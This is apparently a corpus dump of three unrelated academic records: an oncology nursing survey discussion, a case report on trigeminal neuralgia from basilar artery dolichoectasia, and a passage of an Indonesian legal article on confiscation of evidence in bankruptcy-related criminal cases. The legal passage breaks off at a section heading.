This survey investigation was undertaken to identify the problem issues oncology nurses experience in their daily clinical practice. The clinical setting for cancer care delivery is undergoing rapid change and oncology nurses cannot help but be influenced by these changes. Identification of the clinical issues which are consistently experienced as problems was anticipated to have implications for action by practitioners, researchers, educators and administrators. This is the first Canadian study to explore this issue using a comprehensive topic list and requesting ratings which necessitated comparing and contrasting one's practice experience regarding different topic areas.
The tool developed for this study had some limitations. It was comprehensive in listing topic areas and allowed participants to add topics they thought were omitted. However, the tool did not include definitions or descriptions of each item topic and participants may not have had entirely the same ideas about a particular topic when they rated it on the survey. The instrument also did not allow the participants the opportunity to indicate why a particular topic was perceived as a problem. Further investigation is required to fully understand the underlying reasons any one topic area is considered a problem. The rating, however, provides an overall perspective on the types of clinical issues oncology nurses are currently confronting in their daily practice.
The present study sample included proportionally more nurses in the middle age group (35 to 49 years of age) in comparison to registered nurses in Canada (Statistics Canada, 1993) and fewer nurses in the younger age group (less than 35 years). No similar Canadian statistics are currently available describing subgroups of nurses involved in specialty care with regards to age, education or workplace. Therefore it is not known whether the study sample accurately represents the age profile of oncology nurses in Canada. Due to the expertise in knowledge and skill required in oncology nursing and its recognition as a specialty field, it may be likely that an employment requirement includes nursing experience. Thus, this may be reflected in the over-representation of nurses in the middle age group. However, recent lay-offs of younger nursing staff in many clinical settings may also be a contributing factor.
The study sample represents a group of nurses who have considerable clinical experience. Thus, the participants are familiar with cancer care and have the ability to identify important clinical issues. As with all survey studies, respondents likely reflect the views of oncology nurses who have an interest in this topic and may not represent the views of all oncology nurses.
The top clinical problems are clearly within the scope of oncology nursing practice (Table Two). Nine are patient-oriented, with five focusing on psychosocial problems and four on biophysiological problems. Only one top problem reflects concerns about the individual nurse. The problems cross the range of potential types of clinical problems. These results were very similar to the one other study in Canada which examined nurse perceptions of difficult patient problems (Bramwell, 1989).
Although it is not clear from these data why particular problems surface in this top 10 list, one could argue that the nine patient-oriented problems are all complex clinical topics involving both physical and psychosocial dimensions. All require in-depth assessment to fully understand the patient's experience and the interplay between the physical and psychosocial dimensions, as well as to select or tailor interventions for the particular individual. The ranking may reflect the frequency with which the clinical phenomenon is observed in cancer patients coupled with an inability on the part of the nurse to respond appropriately. This inability to respond may be a function of lack of time to perform the assessment and tailor the intervention, a lack of knowledge about the proper intervention, or the application of interventions which are not successful. Lack of knowledge about a particular clinical problem may arise either from not being aware of existing knowledge or because the knowledge itself is not yet available. The latter case is a call for intervention research while the former is a call for educational activity. However, lack of time may well be a reality in light of busy clinical practices and heavy workloads. Such an issue has implications for administrators regarding resource availability and expectations for quality care.
That nursing burn-out was identified as one of the top 10 clinical issues may reflect the number of participants who are front-line providers. This study was undertaken at a time when hospital restructuring had started in Canada. Nursing positions had been reduced and workloads had increased. Feeling a dissonance between what a nurse believes ought to be done for patients and what can be done realistically can be a contributing factor to the identification of nurse burn-out (Bram & Katz, 1989). Particularly for oncology nurses, distress emerges when issues such as poor staffing, excessive use of registry staff, and unexpected crises interfere with their ability to care for patients (Cohen & Sarter, 1992).
Exploring the variations in ranking by age provided interesting observations. The variation in ranking by age group revealed the younger group (<35 years) as the only group to identify communication between patient and physician as a top issue. The majority of the nurses in the younger group worked in a hospital setting. Clearly, inpatient and outpatient settings have different challenges with regards to physician-patient communication. Perhaps in the inpatient setting nurses had the opportunity to observe patient-physician interaction on a regular basis and hear patient frustration about that interaction. Other possible explanations for this rating include the possibilities that these nurses may have been more sensitized to communication issues in their educational programs or they are still developing skills in dealing with this type of clinical issue.
In contrast to the young age group, issues of quality of life surfaced in the middle and mature groups along with higher ratings regarding metastatic disease and recurrent disease. This is in keeping with data revealed in a recent study of oncology nurses' perspectives on quality of life (Fitch, 1998). Many of the experienced nurses in Fitch's study described how experiences within their personal lives and within their practice during their careers culminated in a shift of perspective about the importance of quality of life issues. The shift often resulted in an increased sensitivity to quality of life issues and an emphasis on helping patients achieve their wishes regarding quality of life.
Exploring the influence of education and workplace on the rankings of the top 10 clinical problems was completed for the middle age group because of the undue influence of that group on the overall ratings. It is interesting that in the analysis by workplace, community nurses did not identify care in the home as an issue. Topics such as family issues and home care were included in the list of choices on the survey. The community group was rather small (n=19) and included nurses who worked in education/academic positions (n=13). This is a function of the mailing list as well, in that relatively few community-based nurses were in the original CANO membership list. Hence, the views of front-line community nurses were not prevalent in the rankings. The ranking may reflect the academic or research interests of the individuals in the group and may, in turn, be a function of funding support for research or programs of study. Further work is needed to identify the perspectives of front-line community nurses regarding pressing clinical problems across Canada.
The variation in rankings by education may reflect workplace influences as well. The diploma and baccalaureate groups identified burn-out as an issue, but these groups also had the highest composition of front-line nursing staff working in institutional settings. Front-line staff in hospital settings may be at greater risk for burn-out than nurses working in other types of positions (Bram & Katz, 1989). In the Masters/PhD group, issues identified are likely a reflection of educational preparation. For example, this group identified outcome measures of intervention as a clinical priority, which could be a reflection of the exposure to research in graduate school or their current role.
Principal component analysis
This is the first Canadian study to utilize a principal component analysis to look for patterns in important clinical issues. The principal component analysis was valuable in providing a "big picture" of oncology nurses' perspectives. The analysis relates to the scoring of items and how they relate together. In essence, groups of items are scored in relation to one another the same way. This could reflect a perception of the items as belonging to a broader underlying construct, theme, or clinical problem. For example, the factor of comprehensive cancer care includes a number of issues that are required or should be considered when providing overall cancer care to patients.
All five factors represent topics that are found in the top third of the overall rank order list of 80 items. Therefore, the factors can be considered as representing patterns of "important" clinical problems as identified by practising oncology nurses. For example, "anxiety" is part of a construct/theme called "experience of loss" and is related to other items such as bereavement/death which also were ranked in the upper third of the overall listings.
The issue of communication surfaced in the principal component analysis as an underlying theme, but did not always surface as a top priority in the nurses' lists. This may be because the topic of communication was not presented as one topic in the original list of topics (issues), but rather as four individual items (e.g., communication nurse/patient, communication patient/physician). This may have diluted the emphasis or importance the sample placed on this topic as a whole.
While the variance explained by the first five components is low (42%), some patterns did emerge that explained variability in the data. However, most of the variation remained unexplained. Further research might help to identify factors that explain the patterns in importance of clinical problems. Future analysis needs to be completed individually for different clinical settings.
Nursing implications
The five factors cover significant aspects of clinical oncology nursing. Our data suggest these are areas where oncology nurses in this sample are experiencing problems on a regular basis. Given these findings, there are implications for action.
The data from this study could serve as a springboard for discussion with staff nurses. They could be presented at a unit or departmental level. The discussion could focus on whether the particular staff group share the perspectives expressed in this work and, if so, what they believe are the underlying factors contributing to those perspectives. Once the underlying factors are identified, direction for action may be clear. In addition, it will be important to help staff identify the factors over which they have some control and to focus change strategies in those areas.
Further research may well be indicated in certain areas (i.e., fatigue, anxiety, communication), not only in general terms but also concerning "brief" interventions which can be effectively provided in a busy clinical environment. Additionally, there may be indications for educational interventions for staff focused on assessment and appropriate referral for counselling, support and community programs.
Direction may also exist for strengthening the focus on research-based practice and making use of existing knowledge. For example, it is clear that knowledge exists regarding pain management. However, it would seem that knowledge may not be reaching front-line staff, or our clinical settings have practices that interfere with the use of the existing information on a daily basis (Howell, Fitch & Rechner, in review). This may also be true for other topic areas.
Finally, there may also be indication for strengthening the advocacy role of oncology nurses. At times clinical problems exist but appropriate services are not available. This is frequently the case with supportive care services (Fitch, 1997). Developing explicit standards of practice for supportive care interventions and engaging strong advocacy for appropriate levels of service have been identified as necessary actions if we are to see an improvement in cancer care. Oncology nurses are in excellent positions to advocate for appropriate levels of patient-centered services.
Table Six: Eigenvalues and variance explained for the first five extracted principal components.
The five components explained 42% of the total variance in the problem items dataset.
Table Seven: Varimax rotated factor matrix and loadings of the first five principal components.
All items are ranked according to their loadings from highest to lowest, including the loading value, and each item has a loading in excess of 0.4. | 2018-04-03T04:20:55.857Z | 1999-01-01T00:00:00.000 | {
"year": 1999,
"sha1": "52dfcce49f30c468e71266c28ff77b74505ac2bc",
"oa_license": "CCBYNC",
"oa_url": "http://canadianoncologynursingjournal.com/index.php/conj/article/download/449/450",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "52dfcce49f30c468e71266c28ff77b74505ac2bc",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234369087 | pes2o/s2orc | v3-fos-license | Basilar artery dolichoectasia an unusual and rare cause of secondary trigeminal neuralgia: a clinical report
Objective: Patients with trigeminal neuralgia often consult a dentist for relief of their symptoms, as the pain seems to arise from the teeth and allied oral structures. Basilar artery dolichoectasia is an unusual and very rare cause of secondary trigeminal neuralgia, as it compresses the trigeminal nerve root entry zone. Case reports: We report three cases of trigeminal neuralgia caused by basilar artery dolichoectasia compression. The corneal reflex was absent in all three cases, along with mild neurological deficits in one case. Multiplanar T1/T2W images through the brain disclosed an aberrant, cirsoid (S-shaped) and tortuous dolichoectatic basilar artery offending the trigeminal nerve root entry zone. Discussion: Based on these findings, we propose a protocol for general dentists for the diagnosis of patients with trigeminal neuralgia and the timely exclusion of secondary intracranial causes. Conclusion: General dentists and oral surgeons ought to consider this diagnosis in patients presenting with chronic facial pain, especially pain mimicking neuralgia with loss of the corneal reflex or other neurosensory deficits on the face, along with nighttime pain episodes. Timely and accurate diagnosis and prompt referral to a concerned specialist can have an enormous impact on patient survival in such cases.
INTRODUCTION
Trigeminal neuralgia (TN), an episodic, electric-shock-like pain in one or more branches of the fifth cranial nerve, is one of the most agonizing clinical entities, devastating patients' quality of life (QOL) and incapacitating their ability to speak, eat, drink, touch or wash the face, and brush their teeth [1][2][3]. Reduced measures of daily functioning, quality of life, well-being, sleep, mood, and overall health status are directly associated with TN pain severity, which affects employment in 34% of patients [4].
TN pain drives patients to seek out a dentist for management, as it seems to arise from the teeth or oral structures [5]. It has been reported that 90% of patients with TN-like symptoms experienced pain for more than 1 year before receiving an accurate diagnosis, whereas 13% went 10 years without a diagnosis [2]. Misdiagnosis can lead to unnecessary procedures and delay definitive treatment: about 33% to 65% of patients with TN who initially present to their dentist undergo unnecessary dental treatments [1,2], [5,6].
Idiopathic trigeminal neuralgia is usually caused by intracranial neurovascular conflict, and in 98% of cases the superior cerebellar artery (SCA) is the cause of compression at the trigeminal nerve root entry zone (TREZ) [1]. Basilar artery dolichoectasia is an unusual and very rare cause of TN, represented by a very small number of cases in the literature [7][8][9][10]. We report three cases of TN caused by basilar artery dolichoectasia.
Case No 1
A 20-year-old male complained of electric shock-like pain in the prominence of the cheek for the last three years. He initially presented to a general dentist for management two years earlier, mistaking the pain for toothache. Following a few unsuccessful dental procedures to relieve his pain, the patient was referred to an oral surgeon, who performed a neurectomy of the infra-orbital nerve to treat the TN. The pain recurred after one year, and the patient presented six months after the recurrence. He was on carbamazepine 200 mg but admitted to taking his medication irregularly, as it did not relieve his painful symptoms and instead made him very drowsy throughout the day. On review of history, the patient complained of electric shock-like pain on the right side of the upper face, with more than 10 painful episodes per day that would sometimes awaken him from sleep. On clinical examination and neurosensory testing, the corneal reflex was absent. A magnetic resonance imaging (MRI) brain scan was advised, which revealed an aberrant and tortuous basilar artery in close contact with the pons near the TREZ (Figure 1A). Based on the MRI findings, the patient was promptly referred to the neurosurgery department for vascular decompression. The patient successfully underwent decompression of the trigeminal nerve and remained pain-free through two years of follow-up.
Case No 2
A 45-year-old male presented with severe stabbing pain on the right side of the face for the last five years. He had been to multiple general dentists for management of his pain and had undergone many unsuccessful procedures, including extractions and endodontic treatment. He had also consulted a few oral surgeons who performed neurectomies, which provided some temporary relief. At presentation the patient was on carbamazepine 200 mg and gabapentin 300 mg without much relief. The pain episodes would awaken the patient from sleep and tormented him 15 to 20 times a day. Clinical examination revealed a mild neurosensory deficit on the affected side of the face along with absence of the corneal reflex. On MRI brain scan, a note was made of a large cirsoid (S-shaped) basilar artery in the right cerebellopontine angle indenting the brainstem near the TREZ (Figure 1B). The patient was subsequently referred to the neurosurgery department for vascular decompression of the trigeminal nerve. Following the neurosurgical intervention, the patient recovered all neurological functions and had no complaints of pain or discomfort in the distribution of the trigeminal nerve for two years.
Case No 3
A 40-year-old female presented with lancinating pain in the right upper jaw for the last 4 years. She had consulted a general dentist for management of her symptoms who, after performing a few unsuccessful dental procedures, referred her to an oral surgeon. She had undergone a neurectomy for relief of pain, only to suffer a recurrence after about 6 months. The patient was on carbamazepine 200 mg. On clinical examination, there was a mild neurosensory deficit in the infra-orbital region along with weakness of the corneal reflex. Multiplanar T1/T2W imaging through the brain disclosed an aberrant, dilated and elongated basilar artery offending the TREZ (Figure 1C). The patient was referred to the neurosurgery department for further management, and decompression of the trigeminal nerve was performed by the neurosurgeons. She was followed up for two years after her decompression and remained free from her trigeminal neuralgia.
DISCUSSION
The basilar artery (BA) is formed by the unification of the two vertebral arteries (VAs) and extends along the basilar sulcus of the pons, from the bulbopontine sulcus to the interpeduncular or suprasellar cistern, where it divides into the posterior cerebral arteries (PCAs). It measures approximately 30 mm in length and 1.5 to 4 mm in width; an extension beyond these values indicates the presence of so-called "dolichoectasia", a term derived from the Greek words dolichos, meaning elongation, and ectasia, meaning dilatation, of the BA [11]. It is a very rare cause of trigeminal neuralgia and is observed in approximately 2.8 to 7.7% of patients with vascular compression [7][8][9][10], [12]. Magnetic resonance imaging in our patient showed that the basilar artery was elongated as far as the cerebellopontine angle. According to Smoker et al., this is the most severe elongation of the basilar artery [13].
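As a simple illustration of the dimensional rule just stated, the hypothetical helper below flags measurements outside the normal range (length up to about 30 mm, width 1.5 to 4 mm). The thresholds mirror the text; the function name and example values are invented for illustration and are not a validated radiological criterion.

```python
# A minimal sketch: flag basilar artery measurements outside the normal
# dimensions described in the text. Illustrative only, not a clinical tool.
def assess_basilar_artery(length_mm: float, diameter_mm: float) -> str:
    findings = []
    if length_mm > 30:
        findings.append("elongation (dolicho)")
    if diameter_mm > 4:
        findings.append("dilatation (ectasia)")
    return ", ".join(findings) if findings else "within normal dimensions"

# -> "elongation (dolicho), dilatation (ectasia)"
print(assess_basilar_artery(36.0, 5.2))
```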
Dolichoectasia was first detected as a cause of TN compressing the TREZ by Dandy in 1934, who used the term "cirsoid (S-shaped) aneurysms", emphasizing the elongation, tortuosity, and dilation of the artery with dense walls, in order to specify the characteristic changes in the shape and dimensions of the vessel [14]. Later, in 1945, he encountered 11 similar cases among 108 patients undergoing posterior fossa exploration for treatment of trigeminal neuralgia [15]. One of our cases can be described as cirsoid (S-shaped), as shown in Figure 1B.
Sunderland, in 1948, reported two cases out of 210 autopsies in which the BA was elongated and found to impress the trigeminal nerve [16]. We found three cases of BA dolichoectasia in living patients, with the diagnosis made by MRI brain scan.
Richard H. Lye, in 1986, presented four patients whose investigations demonstrated the presence of an ectatic BA [7]. All four cases presented by Lye were aged above 50 years, with one as old as 82 years and two with histories of mild hypertension, unlike our cases, who were all below the age of 50 years, with one presenting at the age of 20 years. All three of our cases were non-hypertensive, but there was a consistent loss of the corneal reflex in all of them.
The exact etiology of this condition is not completely understood; numerous potential origin hypotheses have been suggested, including hypertension-induced atherosclerosis; congenital factors, given its reported association with various conditions such as autosomal recessive polycystic kidney disease (ARPKD), Pompe disease, Fabry disease due to a novel mutation in the α-galactosidase A (GLA) gene, sickle cell anemia, Marfan syndrome, Ehlers-Danlos syndrome, and PHACES syndrome; infectious diseases, including syphilis and varicella-zoster virus infection; and abnormal matrix metalloproteinase (MMP) expression associated with intracranial arterial dilation. The wide array of cases reported in the literature suggests that the condition may be due to the combined effect of congenital and acquired factors [17]. This may explain the presentation of TN symptoms at a younger age.
This condition may present with widely variable clinical manifestations, the most common being ischemic stroke, brainstem and cranial nerve compression, hydrocephalus, and cerebral hemorrhage; the clinical features may thus be distributed under these four groups. Brainstem compression by VBD usually develops slowly given its gradually progressive nature, and early detection of minor nerve damage has important clinical implications, most commonly prolonged blink reflex latency and altered motor evoked potentials in the limbs [18].
Practically any cranial nerve impairment can be associated, most commonly compression of the trigeminal nerve root and facial nerve root, presenting as trigeminal neuralgia and hemifacial spasm, respectively. Compression of the abducens, trochlear, and oculomotor nerves has also been reported in the literature. Other symptoms such as nystagmus, tinnitus, hoarseness, difficulty swallowing, dysarthria, ataxia, and unilateral hemiparesis are significant to mention, as they could raise the suspicion of this pathology for dental practitioners [17].
Noma and Kobayashi, in 2009, reported three cases of TN due to vertebrobasilar dolichoectasia (VBD) presenting at their dental clinic and, in discussing the dental clinician's role in such cases, emphasized that dentists must be aware of this particular cause of TN [19]. This point can hardly be overemphasized, as all three of our patients experienced pain for three, four, and five years, respectively, before receiving an accurate diagnosis and subsequent management of their symptoms.
The survival rate in VBD after 3 years of follow-up was found to be 60% in a small case series by Ubogu and Zaidat [20]. Passero and Rossi, in 2008, reported a relatively higher death rate following the diagnosis of VBD, as the natural history of the disease shows that such patients may experience a cerebrovascular event with high incidence after the initial diagnosis [21]. Cerebrovascular accidents are significantly related to VBD severity, poor control of hypertension, and the use of antiplatelet or anticoagulant drugs, which increase the risk of hemorrhage [22]. This information is crucial to patient outcomes in TN due to VBD, given the potential tendency of clinicians to focus on the facial pain rather than on the dolichoectasia and its potential complications [23]. Timely and accurate diagnosis by the general dentist and/or the oral surgeon and prompt referral to a concerned specialist can have an enormous impact on patient survival in such cases.
Based on these findings, we propose the following protocol for general dentists for the diagnosis of patients with trigeminal neuralgia and the timely exclusion of secondary intracranial causes of pain (a minimal sketch of this decision logic follows the list):
1. All patients presenting with chronic, electric shock-like unilateral facial pain must undergo a detailed neurological examination to exclude any area of numbness on the face in the distribution of the trigeminal nerve branches.
2. Since most patients with chronic TN-like pain already have a history of multiple surgical procedures, including neurectomy of trigeminal nerve branches and alcohol injections, and may present with pre-existing paresthesia of the face camouflaging an actual neurological disturbance caused by an intracranial lesion, it is recommended to focus on the presence or absence of the corneal reflex in these cases.
3. Any patient with a history of TN-like pain commencing before 40 years of age, occurring at night especially during sleep, and with absence of the corneal reflex must undergo an MRI brain scan to exclude any intracranial lesion or anomaly in the trigeminal nerve root entry zone and be referred promptly to the concerned specialist for further management.
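A minimal, rule-based sketch of the three-step protocol's decision logic, with invented field names; it is an illustration of the screening rules above, not a validated clinical tool.

```python
# Encode the protocol's red flags as a simple referral decision. Field names
# are hypothetical; thresholds mirror the text.
from dataclasses import dataclass

@dataclass
class TNPatient:
    age_at_onset: int
    nighttime_pain: bool          # pain episodes during sleep
    corneal_reflex_present: bool  # rule 2: focus on the corneal reflex
    facial_numbness: bool         # rule 1: trigeminal-distribution deficit

def needs_mri_referral(p: TNPatient) -> bool:
    # Rule 1: any sensory deficit on detailed neurological examination.
    if p.facial_numbness:
        return True
    # Rule 3 combines onset before 40, nocturnal pain, and an absent corneal
    # reflex; a more cautious clinic might refer on any single red flag.
    return p.age_at_onset < 40 and p.nighttime_pain and not p.corneal_reflex_present

print(needs_mri_referral(TNPatient(20, True, False, False)))  # -> True
```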
CONCLUSION
These three cases add to the very few reported cases of TN due to VBD. General dentists and oral surgeons ought to consider this diagnosis in patients with TN presenting with loss of the corneal reflex or other neurosensory deficits on the face, along with nighttime pain episodes. All patients presenting with TN-like symptoms must undergo a mandatory MRI brain scan to avoid delayed or erroneous diagnosis and unsuitable treatment interventions by their general dentists and oral surgeons.
"year": 2020,
"sha1": "08a9e73516325a5fa0dfbc025baee0ea1b98c1ec",
"oa_license": "CCBY",
"oa_url": "https://bds.ict.unesp.br/index.php/cob/article/download/2273/4246",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "e932e1ba707711e61fe71fecbba54023baf0325f",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
266296692 | pes2o/s2orc | v3-fos-license | IMPLEMENTATION OF A JUDGE'S DECISION REGARDING THE EVIDENCE STATUS IN CRIMINAL CASES RELATED TO BANKRUPTCY CONFISCATION
This article discusses criminal acts characterized by large numbers of victims and large losses, exemplified by the cases of PT First Travel and Abu Tours, which share the same motive and charged offense. For the purposes of examining criminal cases, the confiscation of evidence is carried out from the preliminary examination stage onward, covering goods that are the object of a crime, proceeds of a crime, and other goods related to a crime, including goods already under bankruptcy confiscation. The issues discussed are the application of the status of evidence in criminal cases related to bankruptcy-confiscated goods in judges' decisions, and efforts to return evidence to meet the victims' losses due to a crime. Using the normative juridical research method, it was concluded that the judges' considerations, one of the most important aspects in determining the value of a judgment, were not carried out carefully and thoroughly; decisions 3096 K/Pid.Sus/2018 and 3127 K/PID.SUS/2019 are examples whose reasoning is difficult to justify. Efforts are needed to return the confiscated evidence to the victims to redress the losses suffered, in several ways, including improving the search and filing administration system for evidence subject to confiscation from the investigation stage onward, so that case files at the prosecutor's office record whether a bankruptcy confiscation already exists.
INTRODUCTION
In examining criminal cases, from the investigation stage to the trial, the presence of evidence plays a crucial role. Evidence can shed light on the occurrence of a criminal act and ultimately be used to prove the defendant's guilt, supporting the judge's conviction, as alleged by the Public Prosecutor.
This evidence includes objects related to the criminal act, the outcomes of the criminal act, and other items connected to the criminal act. To maintain security and integrity, particularly when items are intended for use as evidence in court proceedings, confiscation is conducted (Yahya Harahap, Pembahasan Permasalahan dan Penerapan KUHAP; Penyidikan dan Penuntutan, Sinar Grafika, Jakarta: 2014, p. 265). Regarding the evidence used for the purpose of proof, investigators have the authority to carry out confiscation, as regulated in Article 1 number 16 of Law No. 8 of 1981 on the Criminal Procedure Law (hereinafter referred to as "KUHAP"), which states: "Confiscation is a series of actions by the investigator to take over and/or retain movable or immovable objects, tangible or intangible, for the purpose of evidence in the investigation, prosecution, and court proceedings. Confiscation can only be carried out by investigators based on the permission of the Chief of the District Court" (see Article 38 paragraph (1) and (2) KUHAP). In accordance with the formulation of Article 1 number 16 of KUHAP, confiscation is the act of taking over items to be stored or retained under the control of the investigator. The evidence subjected to confiscation subsequently becomes confiscated items. Article 39 of KUHAP specifies what can be subjected to confiscation:
1. Items or claims belonging to a suspect or defendant that are wholly or partially suspected to have been obtained from criminal activities or as a result of criminal activities (paragraph (1) letter a).
2. Items that have been directly used in the commission of a criminal act or in preparation for a criminal act (paragraph (1) letter b).
3. Items used to obstruct the investigation of criminal activities (paragraph (1) letter c).
4. Items specially made or intended for the commission of a criminal act (paragraph (1) letter d).
5. Other items directly related to the criminal act in question (paragraph (1) letter e).
6. Items in the possession of parties to civil litigation or bankruptcy proceedings, which can also be confiscated for the purposes of investigation, prosecution, and adjudication of criminal cases, as long as they meet the provisions of paragraph (1) (paragraph (2)).
In cases involving economic crimes such as fraud, embezzlement, and money laundering, three key components come into play: the perpetrator, the criminal act itself, and the proceeds of the crime. The proceeds of the crime can take the form of money or wealth in other forms, such as real estate, jewelry, commercial papers, and so forth. These proceeds are then used as evidence and subjected to confiscation as state-seized property.
Regarding the evidence used as state-seized property, in some cases of criminal acts that have occurred in the past 5 years, an interesting issue has arisen and become a subject of debate. This is because the confiscations carried out by investigators have also covered items or objects that are part of civil litigation or bankruptcy cases. This is made possible because Article 39, paragraph (2) of KUHAP states that items in the possession of civil litigation or bankruptcy proceedings can also be confiscated for the purposes of investigation, prosecution, and adjudication of criminal cases, as long as they meet the provisions of paragraph (1).
Law Number 37 of 2004 regarding Bankruptcy and Postponement of Debt Payment Obligations (hereinafter referred to as the "Bankruptcy Law"), Article 1, number 1, defines bankruptcy as the public seizure of all the assets of the bankrupt debtor, the management and settlement of which are carried out by a curator under the supervision of a supervising judge, as regulated in this law. The public seizure referred to is the confiscation of the entire assets of the debtor for the purpose of settling all the debtor's debts, as mentioned in Article 1131 and Article 1132 of the Civil Code (hereinafter referred to as "KUH Perdata").
Articles 1131 and 1132 of KUH Perdata aim to prevent individual seizures or executions and attempts by creditors to outdo one another. Creditors, consisting of two or more individuals, must act collectively (concursus creditorum) to obtain their rights, because creditors have an equal claim to all of the debtor's assets (paritas creditorium). The wealth must be distributed fairly and proportionally among the creditors, unless there is a compelling reason to prioritize one over the others (pari passu pro rata parte).
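A minimal sketch of the pari passu pro rata parte principle in Python: liquidation proceeds are shared among creditors in proportion to their claims. The creditor names and amounts are invented, and real bankruptcy distributions also account for secured and preferred rankings that this illustration ignores.

```python
# Distribute available proceeds proportionally to each creditor's claim.
# Names and amounts are hypothetical, purely for illustration.
claims = {"creditor A": 600_000_000, "creditor B": 300_000_000,
          "creditor C": 100_000_000}  # claims in IDR
proceeds = 400_000_000                # liquidated estate available

total = sum(claims.values())
payout = {name: proceeds * amount / total for name, amount in claims.items()}
for name, amount in payout.items():
    print(f"{name}: IDR {amount:,.0f}")  # here each recovers 40% of its claim
```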
From this formulation, it can be understood that bankruptcy means the general confiscation of the debtor's assets. This confiscation aims to ensure that all creditors receive equitable payments from the management of the seized assets (Sentosa Sembiring, Hukum Dagang, Citra Aditya Bakti, Bandung: 2015, p. 246). The certainty of the implementation of the general confiscation is regulated in Article 31, paragraph (2) of the Bankruptcy Law, which states: "The declaration of bankruptcy has the effect that all court execution orders against any part of the Debtor's assets that were initiated before bankruptcy must be stopped immediately, and from that moment on, no order can be executed, including detaining the debtor. All confiscations that have been carried out become void, and if necessary, the supervising judge must order their cancellation." Therefore, when a judge has declared a debtor bankrupt, the general confiscation of the debtor's entire wealth takes effect. The consequence is that all previous confiscations become void and transition into the general bankruptcy confiscation, to expedite the resolution of the interests of the bankrupt estate and the rights of the creditors by the trustee. However, if the assets of the bankrupt estate are related to a criminal case and have already been confiscated by investigators, the question arises whether general bankruptcy confiscation and asset management can still be carried out.
The position of confiscation or seizure in criminal cases and general confiscation in bankruptcy has been a subject of debate among legal experts. The debated aspects include the following. First, the public law aspect. In this context, criminal and tax law experts adhere to the public interest represented by criminal and tax laws. On the other hand, civil and bankruptcy law experts also consider bankruptcy cases to be public matters involving the common interest, especially when they involve numerous creditors, as seen in cases like First Travel (63,000 creditors) (Siti Hapsah Isfardiyana, "Sita Umum Kepailitan Mendahului Sita Pidana dalam Pemberesan Harta Pailit", Padjadjaran Jurnal Ilmu Hukum, Vol. 3, No. 3, 2016, p. 644-645) and Abu Tours (1,822 creditors) (Himawan, "Nilai Tagihan Kreditur PKPU Abu Tours Capai Rp 1 Triliun", 9 May 2018, http://news.rakyatku.com/read/100477/2018/05/09/nilai-tagihan-kreditur-pkpu-abu-tours-capai-rp1-triliun, accessed 11 February 2020). Second, the justice aspect. Civil law experts argue that general confiscation should be prioritized because, from a justice perspective, it ensures the fulfillment of creditors' rights and prevents rights violations (Siti Hapsah Isfardiyana, op. cit., p. 648). In criminal law, the justice aspect implies that the guilty should be punished, and to achieve this, supporting evidence, including confiscated items, is crucial. Third, utility. According to civil law experts, prioritizing general confiscation would result in the swift and fair resolution of debt matters, without disrupting the economy on either a small or a large scale. Conversely, if other forms of confiscation, such as criminal confiscation, take precedence, the security of assets is ensured and the confiscated items can serve as evidence. Fourth, the determination and decision aspect. Civil law experts assert that general confiscation should take precedence because it constitutes a judicial judgment, whereas criminal confiscation is considered merely a determination. In civil procedural law, a judgment and a determination are two distinct entities: a judgment is a pronouncement made by the judge during a court hearing, while a determination is a decision by the court regarding voluntary petitions. According to Hadi Shubhan, a court judgment can only be annulled by another court judgment. Law enforcement in criminal cases where there is an intersection between criminal confiscation and bankruptcy confiscation, as elaborated above, has seen numerous cases in Indonesia. However, to focus the discussion, we examine the cases of fundraising from the public for financing Umrah pilgrimages, namely PT First Travel and PT Abu Tours (Amanah Bersama Umat). The case examination and analysis will center on how the judge's decision regarding the status of confiscated evidence in criminal cases affects the return of these items to the rightful owners.
To understand the role of the judge's decision in determining the status of confiscated evidence and in identifying the most rightful claimant of the seized property, an analysis is conducted in the discussion below. Provisions regarding "evidence", although stipulated in the aforementioned articles, do not explicitly specify the status of a piece of evidence. In contrast, in the Common Law system, such as in the United States, evidence is categorized differently. In American criminal procedure law, what is referred to as "forms of evidence" includes real evidence, documentary evidence, testimonial evidence, and judicial notice. In the Common Law system, real evidence (evidence in the form of tangible objects) holds the highest value as a form of evidence. However, it should be noted that in Indonesian criminal procedure, evidence, including real evidence, is not categorized as such. Based on the description above, it can be understood that evidence does not fall under the classification of types of evidence. Article 183 of the Indonesian Criminal Procedure Code (KUHAP) stipulates that to establish the criminal liability of a defendant, their guilt must be proven by at least two pieces of valid evidence. Through the establishment of guilt with at least two pieces of valid evidence, the judge acquires the conviction that the criminal act indeed occurred and that the defendant is the one who committed it.
As previously explained in earlier sections, concerning the status of evidence: although it may not be formally classified as a valid type of evidence, it serves to reinforce valid evidence in legal practice and court proceedings. This demonstrates the connection between physical evidence and valid evidence. According to Article 181 of the Indonesian Criminal Procedure Code (KUHAP), it is evident that in the criminal process, the presence of physical evidence in a court hearing is of utmost importance for the judge to seek and establish the material truth in the case under consideration. Below, two court decisions that are the subjects of this research are described:
c. As evidenced during the trial, these pieces of evidence were the proceeds of crimes committed by the Defendants and were seized from the Defendants, who were proven to have committed not only the crime of "Fraud" but also the crime of "Money Laundering". Therefore, based on the provisions of Article 39 of the Criminal Code ("KUHP") in conjunction with Article 46 of the Criminal Procedure Code (KUHAP), these pieces of evidence were confiscated for the state.
2. Abu Tours Case (Amanah Bersama Umat), Decision Number 3127 K/Pid.Sus/2019

Following the First Travel case, another case involving Hajj and Umrah travel emerged, this time with an even larger number of victims and greater financial losses. This case involved Abu Tours and was initially investigated by the South Sulawesi Regional Police (Polda Sulawesi Selatan) in early 2018. Many reports were received from pilgrims who had paid for trips to the Holy Land of Mecca but were unable to embark on their pilgrimage. During the police investigation, it was revealed that approximately 86,720 pilgrims had their Umrah trips cancelled after they had already paid for the journey. The total financial loss in this case amounted to IDR 1.8 trillion.16 Three victims of the Abu Tours case filed for PKPU (Penundaan Kewajiban Pembayaran Utang, or Postponement of Debt Payment) as applicants. The applicants were: (1) Hj.
Efforts to Return Confiscated Evidence to Compensate Crime Victims
